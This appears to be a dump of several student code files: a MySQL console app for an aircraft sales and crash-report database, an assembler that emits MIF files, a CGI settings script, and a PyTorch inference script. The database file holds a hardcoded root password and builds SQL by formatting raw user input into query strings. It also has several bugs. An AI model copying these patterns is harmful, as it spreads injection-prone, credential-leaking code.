\",man_id,type(man_id))\n\t\t\t\tprint(\"Cost \",cost,type(cost))\n\t\t\t\tcursor.execute(query, (int(man_id),int(cost)))\n\n\t\t\t\tprint(\"Inserted into parts table\")\n\t\t\t\t\n\t\t\t\tquery = \"SELECT ID FROM PARTS ORDER BY ID DESC LIMIT 1;\"\n\t\t\t\tcursor.execute(query)\n\t\t\t\trow = cursor.fetchone()\n\t\t\t\tpart_id = row[0]\n\t\t\t\t\n\t\t\t\tquery = \"INSERT INTO ENGINE (PART_ID,NAME,TYPE,POWER) VALUES (%s,%s,%s,%s);\"\n\t\t\t\tcursor.execute(query,(part_id,part_name,classification,power))\n\n\t\t\t\tprint(\"Inserted into engine table\")\n\t\t\t\tprint(\"Successfully Added\")\n\n\t\t\t\tdb.commit();\n\n\t\telif classification == \"Software\" or classification == \"software\":\n\t\t\tquery = \"SELECT EXISTS(SELECT * FROM SOFTWARE WHERE %s IN (SELECT NAME FROM SOFTWARE))\"\n\t\t\tcursor.execute(query, (part_name))\n\t\t\trow = cursor.fetchone()\n\t\t\t\n\t\t\tif row[0] == 1:\n\t\t\t\tprint(\"Part Already Exists\")\n\t\t\telse:\n\t\t\t\tquery = \"SELECT EXISTS(SELECT * FROM COMPANY WHERE %s IN (SELECT NAME FROM COMPANY))\"\t\t\t\t\t\t\n\t\t\t\tcursor.execute(query, (man_name))\n\t\t\t\trow = cursor.fetchone()\n\t\t\t\t\n\t\t\t\tif row[0] == 0:\n\t\t\t\t\tadd_company(man_name)\n\n\t\t\t\tquery = \"SELECT ID FROM COMPANY WHERE NAME = %s\"\n\t\t\t\tcursor.execute(query, (man_name))\n\t\t\t\trow = cursor.fetchone()\n\t\t\t\tman_id = row[0]\n\n\t\t\t\tcost = int(input(\"Enter Cost of part: \"))\n\t\t\t\t\n\t\t\t\tquery = \"INSERT INTO PARTS (MANUFACTURER_ID,COST) VALUES (%s,%s)\"\n\t\t\t\tprint(\"Manufacturer id \",man_id,type(man_id))\n\t\t\t\tprint(\"Cost \",cost,type(cost))\n\t\t\t\tcursor.execute(query, (int(man_id),int(cost)))\n\n\t\t\t\tprint(\"Inserted into parts table\")\n\t\t\t\t\n\t\t\t\tquery = \"SELECT ID FROM PARTS ORDER BY ID DESC LIMIT 1;\"\n\t\t\t\tcursor.execute(query)\n\t\t\t\trow = cursor.fetchone()\n\t\t\t\tpart_id = row[0]\n\t\t\t\t\n\t\t\t\tquery = \"INSERT INTO SOFTWARE (PART_ID,NAME) VALUES (%s,%s);\"\n\t\t\t\tcursor.execute(query,(part_id,part_name))\n\n\t\t\t\tprint(\"Inserted into engine table\")\n\t\t\t\tprint(\"Successfully Added\")\n\n\t\t\t\tdb.commit();\n\t\telse:\n\t\t\tprint(\"Incorrect part type entered\")\n\texcept:\n\t\tprint(\"Error found somewhere\")\n\ndef delete_parts():\n ID = int(input(\"Enter Part ID: \"))\n query = \"DELETE FROM PARTS WHERE ID = %s\"\n try:\n cursor.execute(query, (ID))\n db.commit()\n except:\n print(\"Error\")\t\n\ndef parts():\n print(\"1. View All\")\n print(\"2. Insert\")\n print(\"3. Delete\")\n print(\"4. Quit\")\n ch = int(input(\"Enter choice :> \"))\n tmp = sp.call('clear',shell=True)\n if ch is 4:\n return\n elif ch>4 or ch<1:\n print(\"Error: Option does not exist.\")\n else:\n if ch is 1:\n display(\"PARTS\")\n elif ch is 2:\n add_parts()\n elif ch is 3:\n delete_parts()\n\n## --- PARTS END -------\n## ------ PLANE START ---------\n\ndef add_plane():\n\tname = input(\"Enter Plane Model Name: \");\n\n\tquery = \"SELECT EXISTS(SELECT * FROM PLANE WHERE %s IN (SELECT NAME FROM PLANE))\"\n\tcursor.execute(query, (name))\n\trow = cursor.fetchone()\n\t\n\ttry:\n\t\tif row[0] == 1:\n\t\t\tprint(\"Plane already exists\")\n\t\telse:\n\t\t\tdate_of_release = input(\"Enter Plane Release Date: \");\n\t\t\t\n\t\t\tquery = \"SELECT EXISTS(SELECT * FROM PLANE_AGE WHERE %s IN (SELECT DATE FROM PLANE_AGE))\"\n\t\t\tcursor.execute(query, (date_of_release))\n\t\t\trow = cursor.fetchone()\n\t\t\t\n\t\t\tif row[0] == 0:\n\t\t\t\tquery = \"INSERT INTO PLANE_AGE VALUES(%s,TIMESTAMPDIFF(YEAR, %s, CURDATE()));\"\n\t\t\t\tcursor.execute(query, (date_of_release,date_of_release))\n\n\t\t\treference_code = \"\"\n\t\t\twhile reference_code == \"\":\n\t\t\t\treference_code = input(\"Enter Reference code: \");\n\t\t\t\tquery = \"SELECT EXISTS(SELECT * FROM PLANE WHERE %s IN (SELECT REFERENCE_CODE FROM PLANE))\"\n\t\t\t\tcursor.execute(query, (date_of_release))\n\t\t\t\trow = cursor.fetchone()\n\t\t\t\tif row[0] == 1:\n\t\t\t\t\tprint(\"Reference code already in use. Please Enter New Reference Code\")\n\t\t\t\t\treference_code = \"\"\n\n\t\t\twing_dim = input(\"Enter Wingspan Dimensions: \");\n\t\t\tnose_dim = input(\"Enter Nose-Tail Dimensions: \");\n\t\t\tsafe_runway_len = input(\"Enter Safe Runway Length: \");\n\t\t\tcapacity = input(\"Enter Plane Capacity: \");\n\n\t\t\tquery = \"INSERT INTO PLANE (NAME,REFERENCE_CODE,DATE_OF_RELEASE,WINGSPAN_DIMENSIONS,NOSE_TAIL_DIMENSIONS,SAFE_RUNWAY_LENGTH,CAPACITY) VALUES (%s,%s,%s,%s,%s,%s,%s);\"\n\t\t\tcursor.execute(query,(name,reference_code,date_of_release,wing_dim,nose_dim,safe_runway_len,capacity))\n\t\t\tdb.commit()\n\texcept:\n\t\tprint(\"Error.\")\n\ndef delete_plane():\n ID = int(input(\"Enter Plane ID: \"))\n query = \"DELETE FROM PLANE WHERE ID = %s\"\n try:\n cursor.execute(query, (ID))\n db.commit()\n except:\n print(\"Error.\")\n\ndef update_plane():\n name = input(\"Enter Plane Name: \") \n ID = int(input(\"Enter Plane ID to be updated: \"))\n try:\n query = \"UPDATE Plane SET NAME = %s WHERE ID = %s\"\n cursor.execute(query, (name, ID))\n db.commit()\n except:\n print(\"Error: Check ID again and try again\")\n\ndef plane():\n print(\"1. View All\")\n print(\"2. Insert\")\n print(\"3. Delete\")\n print(\"4. Update\")\n print(\"5. Quit\")\n ch = int(input(\"Enter choice :> \"))\n tmp = sp.call('clear',shell=True)\n if ch is 5:\n return\n elif ch>=6 or ch<1:\n print(\"Error: Option does not exist.\")\n else:\n if ch is 1:\n display(\"PLANE\")\n elif ch is 2:\n add_plane()\n elif ch is 3:\n delete_plane()\n elif ch is 4:\n update_plane()\n\n## ------ PLANE END -----------\n\ndef admin():\n \n while(1):\n tmp = sp.call('clear',shell=True)\n print(\"1. Audit Table\")\n print(\"2. Purchaser Table\")\n print(\"3. Company Table\")\n print(\"4. Parts Table\")\n print(\"5. Plane Table\")\n print(\"6. Quit\")\n print(\"7. Clear\")\n\n ch = int(input(\"Enter choice :> \"))\n if ch==6:\n break\n elif ch>6 or ch<1:\n print(\"Error: Option does not exist.\")\n else:\n if ch is 1:\n audit()\n elif ch is 2:\n purchaser()\n elif ch is 3:\n company()\n elif ch is 4:\n parts()\n else:\n plane()\n\n# ----- ADMIN END ---------\n\n# ----- EMPLOYEE START -----\n\ndef add_Purchase():\n print(\"Enter the following details\")\n cname = input(\"Purchaser name: \")\n pname = input(\"Plane model name: \")\n qty = int(input(\"Enter Quantity: \"))\n prog = int(input(\"Progress: \"))\n dtp = input(\"Date of Purchase: \")\n dtd = input(\"Date of Decommission Date: \")\n\n try:\n sql = \"INSERT INTO SALE (PLANE_MODEL_ID, COMPANY_ID, QUANTITY, PROGRESS) VALUES ((SELECT ID FROM PLANE WHERE NAME LIKE '%s'), (SELECT ID FROM PURCHASE WHERE NAME LIKE '%s'), %d, %d);\"%(pname, cname, qty, prog)\n cursor.execute(sql)\n db.commit()\n sql = \"INSERT INTO LIST_OF_PLANES (PLANE_MODEL_ID, PURCHASER_ID, DATE_OF_PURCHASE, SALE_ID, DECOMMISION_DATE) VALUES ((SELECT ID FROM PLANE WHERE NAME LIKE '%s'), (SELECT ID FROM PURCHASE WHERE NAME LIKE '%s'), %s, LAST_INSERT_ID(), '%s'));\" %(pname, cname, dtp, dtd)\n cursor.execute(sql)\n db.commit()\n except:\n print(\"Error\")\n\ndef view_Purchase():\n try:\n sql = \"SELECT P.ID, P.NAME, S.ID SALE_ID, S.PLANE_MODEL_ID, S.QUANTITY, S.PROGRESS, L.DATE_OF_PURCHASE, L.DECOMMISION_DATE FROM PURCHASER P, SALE S, LIST_OF_PLANES L WHERE P.ID = S.COMPANY_ID AND P.ID = L.PURCHASER_ID;\"\n cursor.execute(sql)\n db.commit()\n\n row = cursor.fetchone()\n while row is not None:\n print(row)\n row = cursor.fetchone() \n except:\n print(\"Error\")\n\ndef add_Maintenance ():\n print(\"Enter the following details\")\n cname = input(\"Audit Agency name: \")\n pname = input(\"Plane model name: \")\n dtp = input(\"Date of maintenance: \")\n dtd = int(input(\"Cost: \"))\n parts = input(\"Part Changed: \")\n pid = input(\"ID of the part changed\")\n \n try:\n sql = \"INSERT INTO MAINTENANCE_REPORTS (AUDITOR_ID, PLANE_MODEL_ID, MAINTENANCE_DATE, COST, PARTS_CHANGED) VALUES ( (SELECT ID FROM AUDIT_AGENCY WHERE NAME LIKE '%s'), (SELECT ID FROM PLANE WHERE NAME LIKE '%s'), '%s', %d, '%s');\"%(cname, pname, dtp, dtd, parts)\n cursor.execute(sql)\n db.commit()\n sql = \"INSERT INTO CHANGED_PART (MAINTENANCE_REPORT_ID, PART_ID) VALUES (LAST_INSERT_ID(), %d);\" %(pid)\n cursor.execute(sql)\n db.commit()\n except:\n print(\"Error\")\n\ndef view_Maintenance():\n try:\n sql = \"SELECT R.ID, R.PLANE_MODEL_ID, A.ID AUDITOR_ID, A.NAME AUDITOR_NAME, R.MAINTENANCE_DATA, C.PART_ID, R.COST FROM MAINTENANCE_REPORTS R, AUDIT_AGENCY A, CHANGED_PART C WHERE A.ID = R.AUDITOR_ID AND R.ID = C.MAINTENANCE_REPORT_ID;\"\n cursor.execute(sql)\n db.commit()\n row = cursor.fetchone()\n while row is not None:\n print(row)\n row = cursor.fetchone() \n except:\n print(\"Error\")\n\ndef add_Crashreport():\n print(\"Enter the following details\")\n cname = input(\"Investigating agency name: \")\n pname = input(\"Plane model name: \")\n qty = input(\"Reason for crash: \")\n prog = input(\"Casualities: \")\n dtp = input(\"date of purchase: \")\n dtd = input(\"date of incident: \")\n dtm = input(\"date of last maintenance check: \")\n pid = input(\"id of the part that caused incident: \")\n \n sql = \"INSERT INTO CRASHREPORTS (PLANE_MODEL_ID, DATE_OF_PURCHASE, DATE_OF_INCIDENT,DATE_OF_LAST_MAINTENANCE_CHECK, REASEON_FOR_CRASH, INVESTIGATING_AGENCY, CASUALITIES) VALUES ((SELECT ID FROM PLANE WHERE NAME LIKE '%s'), %s, %s, %s, %s, (SELECT ID FROM PURCHASE WHERE NAME LIKE '%s'), '%s'))\" %(pname, dtp, dtd, dtm, qty, cname, prog)\n\n try:\n cursor.execute(sql)\n db.commit()\n sql = \"INSERT INTO PART_FAILURE_CRASH VALUES (LAST_INSERT_ID(), %s)\" %(pid)\n cursor.execute(sql)\n db.commit()\n except:\n print(\"Error\")\n\ndef view_Crashreport():\n sql = \"SELECT C.*, A.NAME INVESTING_AGENCY_NAME, P.PART_ID PART_FAILED FROM CRASHREPORTS C, AUDIT_AGENCY A, PART_FAILURE_CRASH P WHERE C.ID = P.CRASHREPORT_ID AND C.INVESTIGATING_AGENCY = A.ID;\"\n try:\n cursor.execute(sql)\n db.commit()\n row = cursor.fetchone()\n while row is not None:\n print(row)\n row = cursor.fetchone()\n except:\n print(\"Error\")\n\ndef Employee():\n while(1):\n print(\"You can choose from the following options\")\n print(\"1. Add a new purchase\")\n print(\"2. View all purchases till a date\")\n print(\"3. Add a new maintenance check\")\n print(\"4. View all Maintenance checks till a date\")\n print(\"5. Add a new crash report\")\n print(\"6. View all Crash reports till a date\")\n print(\"7. Quit\")\n inp = int(input(\"Enter a number now: \"))\n if inp == 1:\n add_Purchase()\n elif inp == 2:\n view_Purchase()\n elif inp == 3:\n add_Maintenance()\n elif inp == 4:\n view_Maintenance()\n elif inp == 5:\n add_Crashreport()\n elif inp == 6:\n view_Crashreport()\n elif inp == 7:\n return\n else:\n print(\"Incorrect number\")\n\n\n# ----- EMPLOYEE END -------\n\n# ----- ANALYSIS START -----\n\ndef Parts_analysis():\n print(\"Following are the available parts:\")\n display(\"PARTS\")\n\n try:\n part = int(input(\"Enter the part id for which you want to check the reports: \"))\n sql = \"SELECT C.ID CRASH_ID, C.DATE_OF_PURCHASE, C.DATE_OF_INCIDENT, M.ID MANUFACTURER_ID, M.NAME MANUFACTURER_NAME FROM CRASHREPORTS C, PARTS P, PART_FAILURE_CRASH F, COMPANY M WHERE P.ID = %d AND F.PART_ID = P.ID AND M.ID = P.MANUFACTURER_ID AND C.ID = F.CRASHREPORT_ID;\" % (\n part)\n cursor.execute(sql)\n row = cursor.fetchone()\n while row is not None:\n print(row)\n row = cursor.fetchone() \n except:\n print(\"Error\")\n\ndef Maintainence_cost():\n print(\"Following are the available parts:\")\n display(\"PARTS\")\n\n try:\n part = int(input(\"Enter the part id for which you want to check the maintainence reports: \"))\n sql = \"SELECT M.ID MANUFACTURER_ID, M.NAME MANUFACTURER_NAME, IFNULL(SUM(R.COST),0) TOTAL_COST FROM MAINTENANCE_REPORTS R, CHANGED_PART C, PARTS P, COMPANY M WHERE P.ID = %d AND C.PART_ID = P.ID AND M.ID = P.MANUFACTURER_ID AND C.MAINTENANCE_REPORT_ID = R.ID;\" % (\n part)\n cursor.execute(sql)\n row = cursor.fetchone()\n while row is not None:\n print(row)\n row = cursor.fetchone() \n except:\n print(\"Error\")\n\ndef Maintainence_cost_per_part():\n try:\n sql = \"SELECT P.ID PART_ID, SUM(R.COST) TOTAL_COST FROM MAINTENANCE_REPORTS R, CHANGED_PART C, PARTS P WHERE C.PART_ID = P.ID AND C.MAINTENANCE_REPORT_ID = R.ID GROUP BY P.ID;\"\n cursor.execute(sql)\n row = cursor.fetchone()\n while row is not None:\n print(row)\n row = cursor.fetchone() \n except:\n print(\"Error\")\n\ndef Revenue_per_purchaser():\n print(\"Following are the revenue generated per purchasers:\")\n try:\n sql = \"SELECT P.ID, P.NAME, ABS(SUM(S.COST) - SUM(R.COST)) REVENUE FROM PURCHASER P, LIST_OF_PLANES L, SALE S, MAINTENANCE_REPORTS R WHERE L.SALE_ID = S.ID AND L.PURCHASER_ID = P.ID AND R.PLANE_MODEL_ID = L.ID AND S.COMPANY_ID = P.ID GROUP BY P.ID;\"\n cursor.execute(sql)\n row = cursor.fetchone()\n while row is not None:\n print(row)\n row = cursor.fetchone() \n except:\n print(\"Error\")\n\ndef analysis():\n\n while(1):\n tmp = sp.call('clear', shell=True)\n print(\"1. Analysis of crash report of companies manufacturing a part\")\n print(\"2. Analysis of maintenance of a part and companies manufacturing a part\")\n print(\"3. Analysis of all the parts and the cost spent in manufacturing them\")\n print(\"4. Analysis of total revenue generated from a purchaser\")\n print(\"5. Quit\")\n ch = int(input(\"Enter choice :> \"))\n\n if ch is 5:\n break\n else:\n if ch == 1:\n Parts_analysis()\n elif ch == 2:\n Maintainence_cost()\n elif ch == 3:\n Maintainence_cost_per_part()\n elif ch == 4:\n Revenue_per_purchaser()\n else:\n print(\"Incorrect number\")\n\n# ----- ANALYSIS END -----\n\ndef user_config(ch):\n if ch is 1:\n admin()\n elif ch is 2:\n employee()\n elif ch is 3:\n analysis()\n else:\n print(\"Error: User does not exist\")\n\ntmp = sp.call('clear',shell=True)\n\ntry:\n con = db = pymysql.connect(\"localhost\",\"root\",\"Ainsley768692\",\"BOEING\")\n tmp = sp.call('clear',shell=True)\n\n if(con.open):\n print(\"Connected\")\n else:\n print(\"Failed to connect\")\n\nexcept:\n tmp = sp.call('clear',shell=True)\n print(\"Connection Refused: Either username or password is incorrect or user doesn't have access to database\")\n tmp = input(\"Enter any key to CONTINUE>\")\n\n tmp = input(\"Enter any key to CONTINUE>\")\n\nwith con:\n cursor = cur = con.cursor()\n tmp = sp.call('clear',shell=True)\n print(\"1. Admin\")\n print(\"2. Employee\")\n print(\"3. Analyst\")\n print(\"4. Quit\")\n\n ch = int(input(\"Enter choice :> \"))\n tmp = sp.call('clear',shell=True)\n if ch>4 or ch<1:\n print(\"User does not exist. Abort.\")\n else:\n user_config(ch)\n tmp = input(\"Enter any key to CONTINUE>\")","sub_path":"project/functional_final.py","file_name":"functional_final.py","file_ext":"py","file_size_in_byte":21086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"623157446","text":"def tokenize(line,tagDict,numLine):\n inst = line.lower()\n if ':' in inst:\n inst = inst.replace(':','')\n inst = inst.replace('\\n','')\n tagDict[inst] = numLine\n return []\n elif \"j\" in inst:\n aux = inst.split()\n inst = [\"j\", tagDict[aux[1]]]\n else:\n inst = inst.replace('#','')\n inst = inst.replace(',',' ')\n inst = inst.split()\n return inst\n\ndef complement16(binLines):\n for i in range(len(binLines)):\n lenLine = len(binLines[i])\n if lenLine < 16:\n for j in range(16 - lenLine):\n binLines[i] = binLines[i] + \"0\"\n elif lenLine > 16:\n print(\"Incorrect Structure, please review\")\n print(\"0 fill\")\n quit()\n \n\ndef getInst(filename):\n instList = []\n tagDict = {}\n insts = open(filename,\"r\")\n lenAux = open(filename,\"r\")\n length = len(lenAux.readlines())\n for i in range(length):\n instList.append(tokenize(insts.readline(),tagDict,i))\n return writeMif(instList)\n\ndef writeMif(instList):\n binLines = []\n for inst in instList:\n if len(inst)>0:\n if \"add\" in inst[0]:\n processAdd(binLines,inst)\n elif \"sub\" in inst[0]:\n processSub(binLines,inst)\n elif \"vxor\" in inst[0]:\n processVxor(binLines,inst,\"00\")\n elif \"vld\" in inst[0]:\n processVld(binLines,inst,\"00\")\n elif \"vstr\" in inst[0]:\n processVstr(binLines,inst,\"00\")\n elif \"vsr\" in inst[0]:\n processVsr(binLines,inst,\"00\")\n elif \"vsl\" in inst[0]:\n processVsr(binLines,inst,\"00\")\n elif \"vswap\" in inst[0]:\n processVswap(binLines,inst,\"00\")\n elif \"j\" in inst[0]:\n processJump(binLines,inst,\"00\")\n elif \"cmp\" in inst[0]:\n processCmp(binLines,inst,\"00\")\n elif \"nop\" in inst[0]:\n binLines.append(\"0000000000001101\")\n elif \"end\" in inst[0]:\n binLines.append(\"0000000000001110\")\n else:\n print(\"Incorrect Structure, please review\")\n print(\"Inst:\",inst)\n print(\"mif fill\")\n quit()\n complement16(binLines)\n lenBinLines = len(binLines)\n memLen = 512\n f = open(\"inst.mif\",\"w\")\n f.write(\"WIDTH=16;\\n\")\n f.write(\"DEPTH={};\\n\\n\".format(memLen))\n f.write(\"ADDRESS_RADIX=UNS;\\n\")\n f.write(\"DATA_RADIX=BIN;\\n\\n\")\n f.write(\"CONTENT BEGIN\\n\")\n for i in range(lenBinLines):\n f.write(\"\\t{}\\t:\\t{};\\n\".format(i,binLines[i]))\n f.write(\"\\t[{}..{}]\\t:\\t0;\\n\".format(lenBinLines,memLen-1))\n f.write(\"END;\")\n f.close()\n\n\ndef processCondCode(inst):\n if \"ne\" in inst[0]:\n inst[0] = inst[0].replace(\"ne\",'')\n return \"11\"\n elif \"eq\" in inst[0]:\n inst[0] = inst[0].replace(\"eq\",'')\n return \"00\"\n elif \"gt\" in inst[0]:\n inst[0] = inst[0].replace(\"gt\",'')\n return \"01\"\n elif \"al\" in inst[0]:\n inst[0] = inst[0].replace(\"al\",'')\n return \"10\"\n else:\n print(\"Incorrect Structure, please review\")\n print(\"cond code\")\n print(\"Inst:\",inst)\n quit()\n\ndef processReg(reg):\n if '10' in reg:\n return '1010'\n elif '11' in reg:\n return '1011'\n elif '12' in reg:\n return '1100'\n elif '13' in reg:\n return '1101'\n elif '14' in reg:\n return '1110'\n elif '15' in reg:\n return '1111'\n elif '0' in reg:\n return '0000'\n elif '1' in reg:\n return '0001'\n elif '2' in reg:\n return '0010'\n elif '3' in reg:\n return '0011'\n elif '4' in reg:\n return '0100'\n elif '5' in reg:\n return '0101'\n elif '6' in reg:\n return '0110'\n elif '7' in reg:\n return '0111'\n elif '8' in reg:\n return '1000'\n elif '9' in reg:\n return '1001'\n else:\n print(\"Incorrect Structure, please review\")\n print(\"reg code\")\n print(\"Inst:\",inst)\n quit()\n\ndef processVect(vect):\n if '0' in vect:\n return '00'\n elif '1' in vect:\n return '01'\n elif '2' in vect:\n return '10'\n elif '3' in vect:\n return '11'\n else:\n print(\"Incorrect Structure, please review\")\n quit()\n\ndef processImm(imm, bits):\n num = int(imm)\n binStr = bin(num).replace('0b','')\n binLen = len(binStr)\n if binLen < bits:\n for i in range(bits - binLen):\n binStr = '0' + binStr\n elif binLen > bits:\n print(\"Incorrect Structure, please review\")\n print(\"imm code\")\n print(\"Inst:\",inst)\n quit()\n return binStr\n \ndef processAdd(binLines,inst):\n if inst[0] == \"add\":\n rd = processReg(inst[1])\n op1 = processReg(inst[2])\n op2 = processReg(inst[3])\n post = \"1001\"\n res = rd + op1 + op2 + post\n binLines.append(res)\n elif inst[0] == \"addi\":\n rd = processReg(inst[1])\n op1 = processReg(inst[2])\n imm = processImm(inst[3],4)\n post = \"1011\"\n res = rd + op1 + imm + post\n binLines.append(res)\n else:\n print(\"Incorrect Structure, please review\")\n print(\"add code\")\n print(\"Inst:\",inst)\n quit()\n\ndef processSub(binLines,inst):\n if inst[0] == \"sub\":\n rd = processReg(inst[1])\n op1 = processReg(inst[2])\n op2 = processReg(inst[3])\n post = \"1010\"\n res = rd + op1 + op2 + post\n binLines.append(res)\n elif inst[0] == \"subi\":\n rd = processReg(inst[1])\n op1 = processReg(inst[2])\n imm = processImm(inst[3],4)\n post = \"1100\"\n res = rd + op1 + imm + post\n binLines.append(res)\n else:\n print(\"Incorrect Structure, please review\")\n print(\"sub code\")\n print(\"Inst:\",inst)\n quit()\n\ndef processVxor(binLines,inst,condCode):\n if inst[0] == \"vxor\":\n vregoper = processVect(inst[1])\n vregres = processVect(inst[2])\n reg = processReg(inst[3])\n post = \"00010\"\n res = condCode + \"0\" + vregoper + vregres + reg + post\n binLines.append(res)\n elif inst[0] == \"vxori\":\n vregoper = processVect(inst[1])\n vregres = processVect(inst[2])\n imm = processImm(inst[3],5)\n post = \"0011\"\n res = condCode + \"1\" + vregoper + vregres + imm + post\n binLines.append(res)\n else:\n condCode = processCondCode(inst)\n processVxor(binLines,inst,condCode)\n\ndef processVld(binLines,inst,condCode):\n if inst[0] == \"vld\":\n rdir = processReg(inst[1])\n vregdest = processVect(inst[2])\n span = processImm(inst[3],3)\n post = \"00100\"\n res = condCode + rdir + vregdest + span + post\n binLines.append(res)\n else:\n condCode = processCondCode(inst)\n processVld(binLines,inst,condCode)\n\ndef processVstr(binLines,inst,condCode):\n if inst[0] == \"vstr\":\n rdir = processReg(inst[1])\n vregdest = processVect(inst[2])\n span = processImm(inst[3],3)\n post = \"00101\"\n res = condCode + rdir + vregdest + span + post\n binLines.append(res)\n else:\n condCode = processCondCode(inst)\n processVstr(binLines,inst,condCode)\n\ndef processVsr(binLines,inst,condCode):\n if inst[0] == \"vsr\":\n vregoper = processVect(inst[1])\n vregres = processVect(inst[2])\n reg = processReg(inst[3])\n post = \"00110\"\n res = condCode + \"0\" + vregoper + vregres + reg + post\n binLines.append(res)\n elif inst[0] == \"vsl\":\n vregoper = processVect(inst[1])\n vregres = processVect(inst[2])\n reg = processReg(inst[3])\n post = \"00111\"\n res = condCode + \"0\" + vregoper + vregres + reg + post\n binLines.append(res)\n else:\n condCode = processCondCode(inst)\n processVsr(binLines,inst,condCode)\n\ndef processVswap(binLines,inst,condCode):\n if inst[0] == \"vswap\":\n vregoper = processVect(inst[1])\n vregdest = processVect(inst[2])\n bitOrigin = processImm(inst[3],3)\n bitDest = processImm(inst[4],3)\n post = \"1000\"\n res = condCode + vregoper + vregdest + bitOrigin + bitDest + post\n binLines.append(res)\n else:\n condCode = processCondCode(inst)\n processVswap(binLines,inst,condCode)\n\ndef processJump(binLines,inst,condCode):\n if inst[0] == \"j\":\n imm = processImm(inst[1],10)\n post = \"0001\"\n res = condCode + imm + post\n binLines.append(res)\n else:\n condCode = processCondCode(inst)\n processJump(binLines,inst,condCode)\n\ndef processCmp(binLines,inst,condCode):\n if inst[0] == \"cmp\":\n op1 = processReg(inst[1])\n op2 = processReg(inst[2])\n post = \"000000\"\n res = condCode + op1 + op2 + post\n binLines.append(res)\n else:\n condCode = processCondCode(inst)\n processCmp(binLines,inst,condCode)\n\ngetInst(\"demo.txt\")\n","sub_path":"compilador/compilador.py","file_name":"compilador.py","file_ext":"py","file_size_in_byte":9089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"640459002","text":"#!/usr/bin/python3\n\nimport cgi\nimport json\n\nform = cgi.FieldStorage()\n\ngoalLux = int(form.getvalue('goalLux'))\nchlorophyll = str(form.getvalue('chlorophyll'))\nallowingOfAUser = form.getvalue('allowingOfAUser') == 'true'\n\n\nfile_path = '/var/www/html/lightSetting.json'\njson_data = {}\n\n\nwith open(file_path, 'r') as json_file:\n json_data = json.load(json_file)\n json_data[\"goalLux\"] = goalLux\n json_data[\"chlorophyll\"] = chlorophyll\n json_data[\"allowingOfAUser\"] = allowingOfAUser\n \nwith open(file_path, 'w') as outfile:\n json.dump(json_data, outfile, indent='\\t')\n\nprint('Content-type: text/plain')\nprint()\nprint(f'goalLux:{goalLux}')\nprint(f'chlorophyll:{chlorophyll}')\nprint(f'allowingOfAUser:{allowingOfAUser}')\nprint(json_data)\n","sub_path":"light.py","file_name":"light.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"357187813","text":"import torch\nfrom torch import nn, optim\nfrom pathlib import Path\n\nfrom utils.run_utils import initialize, save_dict_as_json, get_logger, create_arg_parser\nfrom utils.train_utils import create_cycle_data_loaders_axial_infer_3axis_microbead\n\nfrom data.input_transforms import PreProcessInfer_3axis\nfrom data.output_transforms import OutputTransform_3axis\n\nfrom models.fc_unet import Unet\nfrom eval_scripts.Inference_microbead import Infer_CU\n\n\ndef train_img(args):\n\n # Creating checkpoint and logging directories, as well as the run name.\n ckpt_path = Path(args.ckpt_root)\n ckpt_path.mkdir(exist_ok=True)\n\n ckpt_path = ckpt_path\n ckpt_path.mkdir(exist_ok=True)\n\n run_number, run_name = initialize(ckpt_path)\n\n ckpt_path = ckpt_path / run_name\n ckpt_path.mkdir(exist_ok=True)\n\n log_path = Path(args.log_root)\n log_path.mkdir(exist_ok=True)\n\n log_path = log_path\n log_path.mkdir(exist_ok=True)\n\n log_path = log_path / run_name\n log_path.mkdir(exist_ok=True)\n\n logger = get_logger(name=__name__, save_file=log_path / run_name)\n\n # Assignment inside running code appears to work.\n if (args.gpu is not None) and torch.cuda.is_available():\n device = torch.device(f'cuda:{args.gpu}')\n logger.info(f'Using GPU {args.gpu} for {run_name}')\n else:\n device = torch.device('cpu')\n logger.info(f'Using CPU for {run_name}')\n\n # Saving peripheral variables and objects in args to reduce clutter and make the structure flexible.\n args.run_number = run_number\n args.run_name = run_name\n args.ckpt_path = ckpt_path\n args.log_path = log_path\n args.device = device\n\n save_dict_as_json(vars(args), log_dir=log_path, save_name=run_name)\n\n # UNET architecture requires that all inputs be dividable by some power of 2.\n divisor = 2 ** args.num_pool_layers\n\n eval_input_transform = PreProcessInfer_3axis(args.device, use_seed=False, divisor=divisor)\n\n # DataLoaders\n eval_loader = create_cycle_data_loaders_axial_infer_3axis_microbead(args)\n\n eval_output_transform = OutputTransform_3axis()\n\n data_chans = args.depth\n\n modelG = Unet(in_chans=data_chans, out_chans=data_chans, chans=args.chans,\n num_pool_layers=args.num_pool_layers).to(device)\n\n if args.load_ckpt:\n model_ckpt = args.prev_model_ckpt\n save_dict = torch.load(model_ckpt)\n modelG.load_state_dict(save_dict['model_state_dict'])\n print('Loaded model checkpoint')\n\n trainer = Infer_CU(args, modelG, eval_loader, eval_input_transform, eval_output_transform)\n\n trainer.inference_axial_from_coronal(args)\n\n\nif __name__ == '__main__':\n\n settings = dict(\n # Variables that almost never change.\n name='test',\n data_root='./dataset/microbead',\n specimen_type='20180726.150404.579.SiO2_5um-001',\n log_root='./logs',\n ckpt_root='./checkpoints',\n batch_size=1,\n chans=32,\n num_pool_layers=3,\n\n # Variables that occasionally change.\n num_workers=0,\n gpu=0, # Set to None for CPU mode.\n use_residual=False,\n depth=1,\n verbose=False,\n sample_rate=1,\n\n # Prev model ckpt\n load_ckpt=True,\n prev_model_ckpt='./checkpoints/microbead/ckpt.tar',\n\n # Evaluation\n save_fdir='./recons/microbead'\n )\n options = create_arg_parser(**settings).parse_args()\n train_img(options)","sub_path":"Infer_microbead.py","file_name":"Infer_microbead.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"393977126","text":"from kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.properties import ObjectProperty\nfrom random import randint\nimport cv2.cv2 as cv2\n\n\nclass WindowMenu(Screen):\n\timg_inp = ObjectProperty(None)\n\timg_exp = ObjectProperty(None)\n\tnr_zdj_text = ObjectProperty(None)\n\ttryb_text = ObjectProperty(None)\n\tmode = 'default'\n\tnr = 1\n\n\tdef random_img(self):\n\t\tnew_nr = randint(1, 16)\n\t\twhile new_nr == self.nr:\n\t\t\tnew_nr = randint(1, 